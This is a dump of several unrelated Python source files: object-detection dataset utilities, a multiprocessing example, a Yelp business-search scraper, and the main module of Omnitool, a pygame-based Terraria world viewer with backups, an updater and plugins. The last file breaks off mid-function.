# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
p4.py
|
import multiprocessing
def evenno(numbers, q):
# put every even number from the iterable onto the shared queue
for n in numbers:
if n % 2 == 0:
q.put(n)
if __name__ == "__main__":
q = multiprocessing.Queue()
p = multiprocessing.Process(target=evenno, args=(range(11), q))
p.start()
p.join()
while q.empty() is False:
print(q.get())
print("Exiting main")
|
main.py
|
import json
#import urllib
#import urllib.parse
import requests
import bs4
import threading
import urllib.parse
import csv
headers = {
'authorization': None,
'cache-control': "no-cache",
}
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
def set_api_key(apiKey):
headers['authorization'] = "Bearer " + apiKey
def get_mobile_site(url):
# Gets the mobile site
headers = { 'User-Agent' : 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B137 Safari/601.1'}
for i in range(3):
try:
res = requests.get(url, headers=headers, timeout=10)
if res.status_code == 200:
return res
except:
pass
def get_desktop_site(url):
# Gets the desktop site
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
for i in range(3):
try:
res = requests.get(url, headers=headers, timeout=10)
if res.status_code == 200:
return res
except:
pass
#need the following parameters (type dict) to perform business search.
#params = {'name':'walmart supercenter', 'address1':'406 S Walton Blvd', 'city':'bentonville', 'state':'ar', 'country':'US'}
def search(term, threadCount, location, saveAs="file.csv"):
params = {'term':term, 'location':location}
#param_string = urllib.parse.urlencode(params)
#conn = http.client.HTTPSConnection("api.yelp.com")
x = "address1="
#res = requests.get("https://api.yelp.com/v3/businesses/matches/best?", headers=headers, params=params)
res = requests.get("https://api.yelp.com/v3/businesses/search", headers=headers, params=params)
#res = conn.getresponse()
#data = res.read()
#data = json.loads(data.decode("utf-8"))
data = res.json()
    print(json.dumps(data, indent=4))
#raw_input("CONTINUE")
a = []
# Iterate over all of the results for this search
results = data["businesses"]
#print(len(results))
    listOfPins = chunks(results, max(1, len(results) // threadCount))  # guard against a zero chunk size when there are fewer results than threads
#print len(list(listOfPins))
def process(listOfResults):
for val in listOfResults:
print(val)
# Replace the URL with a valid mobile URL
url = val['url'].replace("https://www.yelp.com", "https://m.yelp.com")
# Grab the site using mobile headers | yelp will redirect if not
res = get_mobile_site(url)
# Parse the mobile site as a bs4 object
page = bs4.BeautifulSoup(res.text, 'lxml')
# Select the "website" button src
buttonInfo = page.select(".js-external-link-action-button")
val['hasWebsite'] = len(buttonInfo) != 0
if len(buttonInfo) == 0:
val['website'] = None
else:
                val['website'] = urllib.parse.unquote(str(buttonInfo).partition('" href="')[2].partition('"')[0]).partition('&')[0].partition('?url=')[2]
a.append(val)
#print val.keys()
if val['hasWebsite'] == False:
phone = val['display_phone']
if len(phone) < 2:
phone = "NO PHONE NUMBER"
print("{} | {}".format(val['name'], phone))
#print val['website']
threads = [threading.Thread(target=process, args=(ar,)) for ar in listOfPins]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if saveAs != None:
if len(a) > 0:
g = a[0].keys()
new = [g]
for val in a:
new.append([val.get(v, "") for v in g])
with open(saveAs, "wb") as f:
writer = csv.writer(f)
writer.writerows(new)
return a
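# Usage sketch (not part of the original script): the API key, search term and
# location below are illustrative placeholders, not values from the original code.
if __name__ == "__main__":
    set_api_key("YOUR_YELP_API_KEY")  # hypothetical placeholder key
    businesses = search("coffee", threadCount=4, location="Bentonville, AR", saveAs="coffee.csv")
    print("Processed {} businesses".format(len(businesses)))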
|
__init__.py
|
#! python3.4-32
import sys
import os
import multiprocessing
import zlib
import pickle
from importlib import import_module
from urllib.request import urlretrieve
from .shared import cachepath, appdata, __version__
from .loadbar import Bar
from . import render
__author__ = "Fabian Dill"
__credits__ = ["Ijwu", "7UR7L3", "Fabian Dill"]
__maintainer__ = "Fabian Dill"
os.environ["PYGAME_FREETYPE"] = "1"
if not os.path.isdir(appdata):
os.mkdir(appdata)
try:
with open(cachepath, "rb") as f:
cache = pickle.loads(zlib.decompress(f.read()))
except IOError as e:
print("Unable to load cache (" + e.__class__.__name__ + "), creating new cache")
cache = {"worlds": {}, "backup": {}}
with open(cachepath, "wb") as f:
f.write(zlib.compress(pickle.dumps(cache, 2), 9))
except Exception as e:
print("Unable to load cache (" + e.__class__.__name__ + "), creating new cache")
cache = {"worlds": {}, "backup": {}}
with open(cachepath, "wb") as f:
f.write(zlib.compress(pickle.dumps(cache, 2), 9))
if "reset" in sys.argv:
cache = {"worlds": {}}
sys.argv.remove("reset")
if "theme" in cache:
themename = cache["theme"]
else:
themename = "Blue"
if "thumbsize" in cache:
thumbsize = cache["thumbsize"]
else:
thumbsize = (420.0, 120.0)
cache["thumbsize"] = (420, 120)
if "backup" not in cache:
cache["backup"] = {}
if "do_backup" not in cache:
cache["do_backup"] = True
if "columns" not in cache:
cache["columns"] = 3
if "lang" not in cache:
cache["lang"] = "english"
if "version" not in cache:
cache["version"] = __version__
cache["worlds"] = {}
elif cache["version"] < __version__:
print("Newer Omnitool version, resetting world image cache.")
cache["version"] = __version__
cache["worlds"] = {}
from .Language import load_language
lang = load_language(cache['lang'])
if False:
from .Language import english as lang # IDE hook
shared.lang = lang
shared.cache = cache
shared.cores = multiprocessing.cpu_count()
import pygame
from pgu import gui
from .tinterface import *
from .colorlib import walldata, data as colorlib_data
from .tlib import *
import threading
import time
from .pgu_override import MyTheme, MyApp
theme = shared.theme = MyTheme(themename)
import subprocess
import shutil
import sys
import webbrowser
if sys.platform.startswith("win"):
from ctypes import windll
import struct
import tempfile
import json
bit = struct.calcsize("P") * 8
cache_lock = threading.Lock()
def save_cache():
cache_lock.acquire()
d = zlib.compress(pickle.dumps(cache), 9)
with open(shared.cachepath, "wb") as f:
f.write(d)
cache_lock.release()
if len(sys.argv) > 1: # user wants something
def savequit():
import time
time.sleep(3)
save_cache()
pygame.quit()
sys.exit()
if sys.argv[1].split("\\")[-1] == "TEditXna.exe": # install tedit
cache["tedit"] = sys.argv[1]
print("Learned TEdit path: " + sys.argv[1])
savequit()
elif sys.argv[1].split("\\")[-1] == "Terrafirma.exe": # install tedit
cache["terrafirma"] = sys.argv[1]
print("Learned terrafirma path: " + sys.argv[1])
savequit()
myterraria = get_myterraria() # mygames-terraria path
images = myterraria / "WorldImages"
processes = []
if not images.is_dir():
images.mkdir(parents=True)
try:
(myterraria / "Worlds").mkdir()
except:
pass
shutdown = False
def exit_prog(p):
global shutdown
shutdown = True
pygame.quit()
import sys
sys.exit()
shared.exit_prog = exit_prog
def nothing(p):
pass
class GenButton(gui.Button):
def __init__(self, name, gen, width=100, disabled=False):
gui.Button.__init__(self, name, width=width)
self.connect(gui.CLICK, start_proc, bind[gen], True)
self.disabled = disabled
self.blur()
last_gen_start = 0
def start_proc(func, delay=False):
global last_gen_start
if delay:
now = time.time()
if now - last_gen_start < 0.1:
return
last_gen_start = time.time()
if func[1].__class__.__name__ == "list":
p = multiprocessing.Process(target=func[0], name=func[1][0],
args=(func[1][1],))
else:
p = multiprocessing.Process(target=func[0], name=func[1]) # , args = (to_self,))
p.start()
processes.append(p)
class Language(gui.Dialog):
def __init__(self, n=None):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label("Language"), main)
liste = gui.List(200, 150)
langs = ["german", "english", "portuguese", "czech",
"spanish", "french", "norwegian", "japanese",
"danish", "italian", "hungarian", "russian",
"chinese"]
langnames = [lang.capitalize() for lang in langs]
for name, dire in zip(langnames, langs):
liste.add(name, value=dire)
self.liste = liste
self.liste.value = cache["lang"]
main.td(self.liste)
self.open()
def close(self, w=None):
cache["lang"] = self.liste.value
save_cache()
gui.Dialog.close(self, w)
class Settings(gui.Dialog):
def __init__(self, n=None):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label(lang.settings), main)
liste = gui.List(200, 114)
liste.value = themename
themes = "themes"
for dire in os.listdir(themes):
liste.add(str(dire), value=dire)
self.liste = liste
liste = gui.Select()
liste.value = cache["columns"]
for x in (1, 2, 3, 4, 5):
liste.add(str(x), value=x)
self.columns = liste
backupswitch = gui.Switch()
backupswitch.value = cache["do_backup"]
self.backup = backupswitch
sizelist = gui.Select(value=thumbsize)
sizelist.add(lang.none, 0)
sizelist.add(lang.small, (420.0, 120.0))
sizelist.add(lang.medium, (630.0, 180.0))
sizelist.add(lang.large, (840.0, 240.0))
sizelist.add(lang.very_large, (1260.0, 360.0))
self.sizelist = sizelist
main.td(gui.Label(lang.warning, color=(127, 0, 0)), colspan=2)
main.tr()
main.td(gui.Label(lang.theme_select))
main.td(gui.Label(lang.thumbsize))
main.tr()
main.td(self.liste, rowspan=5)
main.td(sizelist)
main.tr()
main.td(gui.Label(lang.world_columns), col=1, row=3)
main.tr()
main.td(self.columns, col=1, row=4)
main.tr()
main.td(gui.Label(lang.mk_backups), col=1, row=5)
main.tr()
main.td(backupswitch, col=1, row=6)
self.open()
def close(self, w=None):
cache["theme"] = self.liste.value
if cache["thumbsize"] != self.sizelist.value:
change = True
else:
change = False
cache["thumbsize"] = self.sizelist.value
cache["do_backup"] = self.backup.value
cache["columns"] = self.columns.value
save_cache()
gui.Dialog.close(self, w)
display_worlds(change)
class Button(gui.Button):
def __init__(self, name, func, args, width=200):
gui.Button.__init__(self, name, width=width)
self.connect(gui.CLICK, func, args)
def open_image(world):
webbrowser.open(str(world.imagepath))
def open_tedit(world):
subprocess.Popen((cache["tedit"], str(world.path)), cwd=os.path.split(cache["tedit"])[0])
def regen_map(world):
if not world.get_worldview():
print("No changes found in world file, rendering skipped.")
def runrender(world, mapping):
if mapping:
megaimage_dir = images / Path(str(world.name))
args = (render.run, megaimage_dir / "index.html",
world.path, True, (world.header, world.pos), megaimage_dir)
p = multiprocessing.Process(target=relay.run_with_browser, name="WorldRender (mapping)", args=args)
else:
args = (world.path, False, (world.header, world.pos))
p = multiprocessing.Process(target=render.run, name="WorldRender", args=args)
p.start()
processes.append(p)
class WorldInteraction(gui.Dialog):
def __init__(self, world):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label(lang.wa_worldactionmenu.format(world.name)), main)
imgopen = Button(lang.wa_imageopen, self.bundle, (open_image, world))
renderopen = Button(lang.wa_renderopen, self.bundle, (runrender, world, False))
updatemap = Button(lang.wa_update, self.bundle, (regen_map, world))
superimg = Button(lang.wa_super, self.bundle, (runrender, world, True))
main.td(imgopen)
main.tr()
main.td(renderopen)
main.tr()
main.td(superimg)
if "tedit" in cache and os.path.exists(cache["tedit"]):
editopen = Button(lang.wa_teditopen, self.bundle, (open_tedit, world))
main.tr()
main.td(editopen)
main.tr()
main.td(updatemap)
self.open()
def close(self, w=None):
gui.Dialog.close(self, w)
def bundle(self, args):
self.close()
args[0](*args[1:])
class World():
aircolor = pygame.Color(200, 200, 255)
groundcolor = pygame.Color(150, 75, 0)
rockcolor = pygame.Color(50, 50, 50)
def __init__(self, path):
self.mapperrunning = threading.Event()
self.path = path
self.imagepath = images / self.path.with_suffix(".png").name
with self.path.open("rb") as f:
self.header, self.multiparts, self.sectiondata = get_header(f)
if self.sectiondata:
self.pos = self.sectiondata["sections"][1]
if f.tell() != self.pos:
print("Warning: Header for world",self.header["name"].decode(),"of different size than expected, errors may occur.")
else:
self.pos = f.tell()
self.name = self.header["name"].decode()
self.size = gui.Label(str(self.header["width"]) + "X" + str(self.header["height"]) + " tiles")
self.label = gui.Label(self.header["name"])
if thumbsize:
self.info = gui.Table(width=thumbsize[0])
else:
self.info = gui.Table(width=420)
self.info.td(self.label, align=-1)
if self.header["hardmode"]:
self.info.td(gui.Label("Hardmode", color=(250, 0, 0)), align=0)
self.info.td(self.size, align=1)
self.raw = pygame.surface.Surface((self.header["width"], self.header["height"]))
self.raw.fill(self.aircolor)
self.thumbsize = thumbsize
if thumbsize:
self.get_thumb()
self.image = gui.Image(self.thumb)
self.image.connect(gui.CLICK,
WorldInteraction,
self)
self.get_worldview()
def get_thumb(self, size=thumbsize):
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
self.thumb = pygame.transform.rotozoom(self.raw, 0, scale)
def update_thumb(self, size=None):
if size == None:
size = self.thumbsize
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
i = pygame.transform.rotozoom(self.raw, 0, scale)
self.thumb.blit(i, (0, 0))
def override_thumb(self, size=thumbsize):
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
self.thumb = pygame.transform.rotozoom(self.raw, 0, scale)
self.image.change_image(self.thumb)
def check_change(self):
if not self.mapperrunning.is_set():
redraw = False
try:
strpath = str(self.path)
if strpath in cache["worlds"] and self.path.stat().st_mtime > cache["worlds"][strpath]["time"]:
redraw = True
except FileNotFoundError: # world happened to be removed between checks
pass
else: # why is there no elif on try?
if redraw:
self.raw.fill(self.aircolor)
self.get_worldview()
def get_worldview(self):
        self.mapperrunning.set()  # make sure Redrawer knows that acquisition of this image is in progress
needed = False
try:
if str(self.path) in cache["worlds"]:
worldcache = cache["worlds"][str(self.path)]
if self.path.stat().st_mtime == worldcache["time"]:
i = proxyload(images / self.path.with_suffix('.png').name)
else:
raise IOError("Image is outdated")
else:
cache["worlds"][str(self.path)] = {"time": 0}
raise IOError("Image does not exist")
except IOError:
needed = True
else:
self.raw.blit(i, (0, 0))
self.update_thumb()
save_cache()
if needed:
size = self.raw.get_size()
levels = self.header["groundlevel"], self.header["rocklevel"]
pygame.draw.rect(self.raw, self.groundcolor,
((0, levels[0]),
(size[0], size[1] - levels[0])))
pygame.draw.rect(self.raw, self.rockcolor,
((0, levels[1]),
(size[0], size[1] - levels[1])))
self.update_thumb()
t = PLoader(self)
t.name = "Vanilla-Mapper-%s" % self.header["name"]
t.start()
else:
self.mapperrunning.clear()
return needed
def gen_slices(queue, imgpath, path, start, size, levels, version, multiparts, interval=32):
get_tile = select_tile_getter(version)
with path.open("rb") as f:
f.seek(start)
xworld, yworld = size # read world size from header cache
s = pygame.surface.Surface(size, depth=24)
s.fill((200, 200, 255))
pygame.draw.rect(s, (150, 75, 0),
((0, levels[0]),
(size[0], size[1] - levels[0])))
pygame.draw.rect(s, (50, 50, 50),
((0, levels[1]),
(size[0], size[1] - levels[1])))
buffer = pygame.PixelArray(s)
xstart = 0
while xstart < xworld:
w = min(interval, -xstart + xworld)
for xi in range(xstart, xstart + w): # for each slice
yi = 0
while yi < yworld: # get the tiles
(tile, wall, liquid, multi, wire), b = get_tile(f)
color = None
                    if not liquid:  # liquid == 0 means no liquid
                        # there could be a liquid and a tile, like a chest and water,
                        # but only one color can be set per pixel, so the tile is prioritised
                        if tile is None:
if wall:
if wall in colorlib.walldata:
color = colorlib.walldata[wall]
else:
color = (wall, wall, wall)
elif tile in colorlib.data:
color = colorlib.data[tile] # if colorlib has a color use it
else:
tile = min(255, tile)
color = (tile, tile, tile) # make a grey otherwise
elif liquid > 512:
color = (245, 219, 27)
elif liquid > 256:
color = (150, 35, 17)
                    else:  # 0 < x <= 256 is water; the higher x is, the more water there is
color = (19, 86, 134)
if color:
buffer[xi, yi:yi + b] = color
yi += b
sub = buffer[xstart:xstart + w, ::].make_surface()
queue.put([w, pygame.image.tostring(sub, "RGB")])
xstart += w
del (buffer)
queue.close()
pygame.image.save(s, imgpath)
class PLoader(threading.Thread):
def __init__(self, world):
threading.Thread.__init__(self)
self.world = world
def run(self):
world = self.world
wx, wy = size = (world.header["width"], world.header["height"])
levels = world.header["groundlevel"], world.header["rocklevel"]
xi = 0
version = world.header["version"]
pos = world.pos
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=relay.launch_gen_slices, args=(
queue, str(self.world.imagepath), world.path, pos, size, levels, version, world.multiparts))
p.start()
while xi < wx:
x, imgdata = queue.get()
surface = pygame.image.fromstring(imgdata, (x, wy), "RGB")
            while world.raw.get_locked():  # if the window is being resized, keep waiting
time.sleep(0.1)
world.raw.blit(surface, (xi, 0))
world.update_thumb()
world.image.repaint()
xi += x
p.join() # wait until the image file is saved
cache["worlds"][str(world.path)]["time"] = world.path.stat().st_mtime
save_cache()
world.mapperrunning.clear()
def full_split(root):
split = list(os.path.split(root))
rsplit = [split[1]]
while split[1] != "":
split = os.path.split(split[0])
rsplit.append(split[1])
rsplit = rsplit[:-1]
rsplit.append(split[0])
rsplit.reverse()
return rsplit
class Info(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global shutdown
import time
while 1:
if shutdown: sys.exit()
threads = threading.enumerate()
x = len(threads)
unneeded = ("SockThread", "Info")
dead = False
for thread in threads:
if thread.name == "MainThread":
if not (thread.is_alive()): dead = True
elif (thread.name) not in unneeded:
x -= 1
if x <= 2 and dead and len(processes) == 0:
if not shutdown:
print("All important threads have exited, full shutdown in 15 seconds")
time.sleep(15)
sys.exit()
# print ("alive")
dead = []
for p in processes:
# print (p.exitcode, p.is_alive())
# print (p)
if not p.is_alive(): dead.append(p)
for d in dead:
d.join()
processes.remove(d)
time.sleep(1)
sys.exit()
class Backupper(threading.Thread):
"""Thread handling background backups - quits when everything is backed up"""
def __init__(self):
threading.Thread.__init__(self)
def backup(self, path, dest):
t = path.stat().st_mtime
if path not in cache["backup"] or t != cache["backup"]:
s = time.strftime("%SS_%MM_%HH_%dD_%b_%YY.", time.localtime(t))
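            # s looks like e.g. "30S_15M_12H_01D_Jan_2020Y." (illustrative), prepended to the world file name below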
shutil.copy(str(path), str(dest / (s + path.name)))
cache["backup"][str(path)] = t
def run(self):
dest = myterraria / "WorldsBackup"
if not dest.is_dir():
dest.mkdir()
# source = os.path.join("C:\program files (x86)\\steamapps\common\Terraria")
worlds = list(get_worlds())
for path in worlds:
self.backup(path, dest)
if len(worlds) == 0:
print("BackUpper has found no worlds")
dest = myterraria / "PlayersBackup"
if not dest.is_dir():
dest.mkdir()
try:
players = get_players()
for path in players:
self.backup(path, dest)
except FileNotFoundError:
print("BackUpper has found no player files")
print("Backups made")
        save_cache()  # persist the backup timestamps before the thread exits
        sys.exit()
class Redrawer(threading.Thread):
"""Thread that waits for changes in the world folder and triggers a menu redraw when necessary"""
def __init__(self):
threading.Thread.__init__(self)
self.name = "Redrawer"
self.daemon = True
def run(self):
global worlds
new = []
dropped = []
while 1:
time.sleep(1)
if dropped:
worlds = list(filter(lambda world: world.path not in dropped, worlds))
for world in worlds:
world.check_change()
if new:
for name in new:
get_world(name, worlds)
if new or dropped:
print("World File Change Detected!")
app.queue.append((display_worlds,))
names = set(get_worlds())
new = names - set(worldnames)
dropped = set(worldnames) - names
if new:
worldnames.extend(new)
if dropped:
for w in dropped:
worldnames.remove(w)
class Updater(threading.Thread):
ziploc = os.path.join(appdata, "tImages.zip")
verloc = os.path.join(appdata, "tImages.json")
def __init__(self, update):
threading.Thread.__init__(self)
self.name = "Updater"
self.update = update
def run(self):
import urllib.request
import json
f = urllib.request.urlopen("http://dl.dropbox.com/u/44766482/ot_updater/ot_version.json").read()
js = json.loads(f.decode())
verint = js["omnitool"]
if verint > __version__:
from .version import Version
text = gui.Label("Version " + Version(verint).__repr__() + lang.available, color=(255, 0, 0))
self.update.td(text, align=-1)
text2 = gui.Label(lang.changelog, color=(100, 100, 255))
self.update.td(text2, align=1)
text2.connect(gui.CLICK,
webbrowser.open,
"http://adf.ly/686481/omnitool-github-releases")
text.connect(gui.CLICK,
webbrowser.open,
"http://adf.ly/686481/omnitool-github-releases")
if not os.path.exists("tImages.zip") or self.check_texture_version(js["tImages"]): # newer version available
args = (r"http://dl.dropbox.com/u/44766482/ot_updater/tImages.zip",
str(self.ziploc),
"Texture Download",
False)
p = multiprocessing.Process(target=remote_retrieve, name="tImages Retriever", args=args)
p.start()
p.join()
import json
with open(self.verloc, "w") as f:
json.dump({"version": js["tImages"]}, f)
print("Updater done")
sys.exit()
def check_texture_version(self, remote_texture_version):
if os.path.exists(self.ziploc) and os.path.exists(self.verloc):
import json
with open(self.verloc) as f:
js = json.load(f)
if js["version"] >= remote_texture_version:
return False
return True
def remote_retrieve(source, target, name, abortable=True):
"""
Retrieves remote file, showing a pygame progressbar for progress.
As there can only be one pygame window per process, it is recommended to run this as a subprocess.
:param source: URL source of file
:param target: local target location
:param name: caption of pygame window
:return:
"""
bar = Bar(caption=name, abortable=abortable)
def reporthook(blocknum, blocksize, totalsize):
read = blocknum * blocksize
if totalsize > 0:
percent = read * 100 / totalsize
else: # total size is unknown
percent = 0
bar.set_progress(percent, name + " {:d}%".format(int(percent)))
urlretrieve(source, target, reporthook)
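# Usage sketch (illustrative, mirroring how Updater launches it above; the URL and
# filename are placeholders): run remote_retrieve in its own process so its pygame
# progress window does not clash with the main Omnitool window.
#   p = multiprocessing.Process(target=remote_retrieve,
#                               args=("http://example.invalid/file.zip", "file.zip", "Download"))
#   p.start(); p.join()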
def proxyload(path):
with path.open("rb") as f:
d = pygame.image.load(f, path.suffix[1:])
return d
if "directlaunch" in sys.argv:
if cache["do_backup"]:
b = Backupper()
b.name = "Backup"
b.daemon = False
b.start()
webbrowser.open("steam://rungameid/105600")
sys.exit()
def get_world(world, worlds):
try:
w = World(world)
except Exception as e:
print("Error loading world %s:" % world)
import traceback
traceback.print_exc()
else:
worlds.append(w)
def open_dir(direc):
direc = str(direc)
if sys.platform == 'win32':
subprocess.Popen(['explorer', direc], shell=True)
elif sys.platform == 'darwin':
subprocess.Popen(['open', direc])
else:
try:
subprocess.Popen(['xdg-open', direc])
except OSError:
pass
plugins_ = []
def get_plugins():
if "." not in sys.path:
sys.path = ["."] + sys.path # use plugins in the folder, instead of library.zip - if accidentally included
for file in os.listdir("plugins"):
if file[-3:] == ".py" and file != "plugins.py" and file != "__init__.py":
try:
plugin = import_module('plugins.' + file[:-3], package="omnitool")
except:
import traceback
print("Error importing plugin %s:" % file[:-3])
traceback.print_exc()
else:
name, ptype = plugin.config["name"], plugin.config["type"]
plugins_.append((file[:-3], name, ptype))
return plugins_
def plug_save(Plug):
if hasattr(Plug, "loadingbar"):
# we have a loadingbar to attend to
loadcallback = Plug.loadingbar
else:
loadcallback = None
f = tempfile.SpooledTemporaryFile(10000000) # 10 megabyte ram file
set_header(f, Plug.header)
try:
Plug.tiles[0]
except:
Plug.tiles.seek(0)
f.write(Plug.tiles.read())
else:
set_tiles(f, Plug.tiles, Plug.header, True, loadcallback)
set_chests(f, Plug.chests)
set_signs(f, Plug.signs)
[set_npc(f, npc) for npc in Plug.npcs]
set_npc(f, None)
set_npc_names(f, Plug.names)
set_trail(f, (1, Plug.header["name"], Plug.header["ID"]))
with get_next_world(Plug.header["name"]).open("wb") as g:
f.seek(0)
g.write(f.read())
def launch_plugin(plug):
import importlib
if "." not in sys.path:
sys.path = ["."] + sys.path # use plugins in the folder, instead of library.zip - if accidentally included
Plugin = importlib.import_module("plugins." + plug[0], "omnitool")
if plug[2] == "receiver":
worlds = list(get_worlds())
from . import plugingui
w = plugingui.run(worlds, Plugin, "rec")
if w:
with w.open("rb") as f:
Plug = Plugin.Receiver()
f.buffer = [0]
header = get_header(f)[0]
print("sending header")
if Plug.rec_header(header) != False:
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
print("sending tiles")
if Plug.rec_tiles(tiles) != False:
if Plug.rec_chests(chests=[get_chest(f) for x in range(1000)]) != False:
if Plug.rec_signs(signs=[get_sign(f) for x in range(1000)]) != False:
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
if hasattr(Plug, "run"):Plug.run()
else:
print("No world selected, aborting execution")
elif plug[2] == "generator":
Plug = Plugin.Generator()
Plug.run()
plug_save(Plug)
elif plug[2] == "program":
Plug = Plugin.Program()
Plug.run()
elif plug[2] == "transplant":
worlds = list(get_worlds())
        from . import plugingui  # match the relative import used in the receiver branch
w1, w2 = plugingui.run(worlds, Plugin, "trans")
with w2.open("rb") as f:
Plug = Plugin.Transplant()
f.buffer = [0]
header = get_header(f)[0]
Plug.rec_header(header)
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
Plug.rec_tiles(tiles)
Plug.rec_chests(chests=[get_chest(f) for x in range(1000)])
Plug.rec_signs(signs=[get_sign(f) for x in range(1000)])
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
Plug.run()
with w1.open("rb") as f:
# Plug = Plugin.Transplant()
